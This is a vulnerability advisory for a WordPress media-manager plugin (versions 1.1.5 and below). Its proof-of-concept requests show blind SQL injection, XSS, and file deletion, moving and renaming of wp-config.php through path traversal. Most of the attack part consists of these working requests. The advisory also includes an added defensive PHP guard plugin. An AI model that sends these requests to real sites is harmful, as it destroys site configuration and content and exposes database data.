
WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Posted May 14, 2015
Authored by Evex

WordPress Media File Manager Advanced plugin versions 1.1.5 and below suffer from cross-site scripting, assorted file and content modification, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 4166675e925816acdce6d734916fadfe5a205ce3a81f8404d06202ad9247bc71

Description

"media-file-manager-advanced" lets any authenticated user execute
administrator actions because of weak permission checking.
An attacker can delete or update posts; create, remove and list directories;
move, rename and delete files; and perform blind SQL injection and
cross-site scripting.

Homepage

https://wordpress.org/plugins/media-file-manager-advanced/

Affected Version

<= 1.1.5


Vulnerability Scope


LFD, SQL injection, XSS, site ruining and changing of content.

Authorization Required

User

Proof of Concept


Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

folder exists: http://domain.tld/wp-content/uploads/EVEXFOLDER

RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

not found: http://domain.tld/wp-content/uploads/EVEXFOLDER

UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

no more wp-config.php

Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Sleeps for 10 seconds

XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

Alerts(1)

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

now wp-config.php is in /wp-content/uploads/wp-config.php


Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

now wp-config.php is renamed to wp-config.txt

Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

will list all files and directories

Fix

No Fix Available at The Moment.
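
With no vendor fix, the requests above can be stopped before they reach the plugin by a must-use plugin that enforces the checks the handlers lack. This is an added example, not code from the advisory or from the plugin; the function name mfma_guard_check, the required capability (manage_options) and the list of path parameters are assumptions taken from the requests shown in the proof of concept.

```php
<?php
/**
 * Plugin Name: MFMA AJAX guard (added example, not the plugin's own code)
 * Place in wp-content/mu-plugins/. The required capability and the
 * parameter list below are assumptions drawn from the advisory's requests.
 */

// admin-ajax.php fires admin_init before it dispatches wp_ajax_{action},
// so this check runs ahead of the plugin's own handlers.
add_action( 'admin_init', 'mfma_guard_check', 0 );

function mfma_guard_check() {
    if ( ! wp_doing_ajax() || empty( $_REQUEST['action'] ) ) {
        return;
    }
    $action = (string) wp_unslash( $_REQUEST['action'] );
    if ( strpos( $action, 'mfma_relocator_' ) !== 0 ) {
        return; // not one of the plugin's AJAX actions
    }

    // 1. Authorization: the advisory shows any logged-in user reaching these.
    //    Assumption: only administrators should manage media files.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
    }

    // 2. id must be a plain integer, which rejects the SQL and markup payloads.
    if ( isset( $_REQUEST['id'] )
        && ! ctype_digit( (string) wp_unslash( $_REQUEST['id'] ) ) ) {
        wp_die( 'Invalid id', 'Bad Request', array( 'response' => 400 ) );
    }

    // 3. Path parameters must not contain ".." segments or NUL bytes,
    //    the form of traversal used in the advisory's requests.
    $path_params = array( 'dir', 'dir_from', 'dir_to', 'name',
                          'from', 'to', 'items', 'newdir' );
    foreach ( $path_params as $key ) {
        if ( ! isset( $_REQUEST[ $key ] ) ) {
            continue;
        }
        $value    = str_replace( '\\', '/', (string) wp_unslash( $_REQUEST[ $key ] ) );
        $segments = explode( '/', $value );
        if ( in_array( '..', $segments, true ) || strpos( $value, "\0" ) !== false ) {
            wp_die( 'Invalid path', 'Bad Request', array( 'response' => 400 ) );
        }
    }
}
```

The guard only filters requests; the unprepared query and unescaped output inside the plugin remain, so removing or replacing the plugin is still the durable remedy.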

Timeline

Notified Vendor - No Reply
Publish Disclosure